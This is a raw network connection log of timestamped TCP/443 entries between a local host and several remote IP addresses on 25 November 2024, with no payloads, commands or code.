Nov 25, 2024 11:34:11.567559958 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.567646027 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.583183050 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.583214045 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.583250046 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.583259106 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.583287954 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.583306074 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.601361036 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.601387024 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.601430893 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.601438046 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.601461887 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.601485968 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.605429888 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.608551979 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.608720064 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.608778954 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.608778954 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.608792067 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.608798027 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.611289978 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.611310005 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.611423969 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.611560106 CET	49954	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.611569881 CET	443	49954	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.639200926 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.639226913 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.639262915 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.639281034 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.639290094 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.639318943 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.639797926 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.639811039 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.639822960 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.639971972 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.640022039 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.640085936 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.649471998 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.649493933 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.649569035 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.649585009 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.649631977 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.660235882 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.663829088 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.663961887 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.664094925 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.664103985 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.675122976 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.675136089 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.675205946 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.675363064 CET	49955	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.675373077 CET	443	49955	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.712136984 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:11.740776062 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.740814924 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.740848064 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.740860939 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.740906000 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.740925074 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.755214930 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.755244017 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.755280018 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.755286932 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.755337000 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.759331942 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:11.760329008 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:11.767926931 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.767956972 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.768002033 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.768007994 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.768069983 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.776218891 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.776245117 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.776281118 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.776287079 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.776303053 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.776324987 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.783938885 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.783961058 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.784033060 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.784039021 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.784075975 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.785264015 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.785300016 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.785511971 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.785779953 CET	49956	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:11.785792112 CET	443	49956	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:11.792206049 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.792231083 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.792306900 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.792315960 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.792355061 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.799371958 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.799395084 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.799448013 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.799455881 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.799500942 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.802118063 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.802453995 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:11.802469015 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.802943945 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.803280115 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:11.803378105 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.803493977 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:11.807328939 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:11.851334095 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.941992044 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.942017078 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.942055941 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.942065954 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.942109108 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.942123890 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.948631048 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.948651075 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.948684931 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.948693037 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.948729992 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.955857992 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.955879927 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.955914021 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.955920935 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.955951929 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.955970049 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.962275982 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.962297916 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.962342024 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.962347031 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.962392092 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.962408066 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.969598055 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.969619036 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.969657898 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.969662905 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.969696999 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.969711065 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.976444006 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.976464987 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.976516962 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.976522923 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.976552010 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.976567984 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.983827114 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.983849049 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.983899117 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.983911991 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.983938932 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.983952999 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.989419937 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.989810944 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:11.989825964 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.990202904 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.990974903 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.990999937 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.991048098 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.991053104 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.991089106 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.991516113 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:11.991585016 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:11.991658926 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.026674032 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:12.026698112 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:12.026798964 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:12.026962996 CET	49957	443	192.168.2.5	20.50.201.195
Nov 25, 2024 11:34:12.026978970 CET	443	49957	20.50.201.195	192.168.2.5
Nov 25, 2024 11:34:12.039326906 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.083376884 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:12.083441973 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:12.083628893 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:12.084158897 CET	49958	443	192.168.2.5	23.96.180.189
Nov 25, 2024 11:34:12.084172964 CET	443	49958	23.96.180.189	192.168.2.5
Nov 25, 2024 11:34:12.104305983 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:12.104389906 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:12.104453087 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:12.105282068 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:12.105298042 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:12.141535044 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:12.141566992 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:12.141726971 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:12.141988993 CET	49959	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:12.142003059 CET	443	49959	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:12.152590036 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.152621031 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.152662039 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.152673960 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.152704954 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.152725935 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.156886101 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:12.156965971 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:12.157111883 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:12.159193993 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.159209967 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.159260988 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.159272909 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.159328938 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.166426897 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.166441917 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.166754961 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.166765928 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.166809082 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.173769951 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.173789978 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.173861980 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.173870087 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.173912048 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.180138111 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.180156946 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.180198908 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.180206060 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.180248976 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.187026024 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.187058926 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.187109947 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.187114954 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.187156916 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.194762945 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.194788933 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.194834948 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.194840908 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.194880962 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.201720953 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.201742887 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.201781988 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.201787949 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.201813936 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.201828003 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.247507095 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.247721910 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.247931004 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.295254946 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:12.295272112 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:12.313066006 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:12.314241886 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.314265013 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.354585886 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.355118990 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.355140924 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.355237961 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.355340958 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:12.355719090 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.355741978 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.355812073 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.356894970 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.356905937 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.356961012 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.357290983 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.357297897 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.357391119 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.357686043 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.357702017 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.357768059 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358098030 CET	49960	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358115911 CET	443	49960	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.358364105 CET	49964	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358376980 CET	443	49964	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.358560085 CET	49963	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358575106 CET	443	49963	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.358748913 CET	49962	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358762980 CET	443	49962	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.358892918 CET	49961	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.358901978 CET	443	49961	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.363435030 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.363467932 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.363539934 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.363550901 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.363599062 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.369786024 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.369808912 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.369880915 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.369889021 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.369935036 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.370888948 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.370942116 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.370946884 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.370991945 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.371834993 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.371853113 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.371876955 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.371907949 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.395396948 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.446922064 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.446944952 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.447006941 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.447025061 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.447153091 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.447201014 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.478046894 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:12.478071928 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:12.718388081 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718487024 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718508005 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718528986 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718539000 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.718553066 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718569040 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718585014 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.718590021 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718606949 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718620062 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.718635082 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.718646049 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.766571999 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.782269001 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:12.782782078 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.782802105 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.783382893 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:12.783437014 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.783488035 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:12.786057949 CET	49965	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:12.786072016 CET	443	49965	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:12.797646999 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:12.797671080 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:12.800465107 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:12.800482035 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:12.801004887 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:12.801440001 CET	49966	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:12.801455975 CET	443	49966	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:12.916302919 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916341066 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916358948 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916388988 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.916407108 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916413069 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.916429043 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916449070 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916455030 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.916476011 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.916477919 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.916521072 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.923573971 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.923804045 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.969368935 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.969393015 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.969429016 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.969446898 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.969458103 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.969465017 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.969480038 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:12.969491005 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:12.969510078 CET	49918	443	192.168.2.5	104.117.182.56
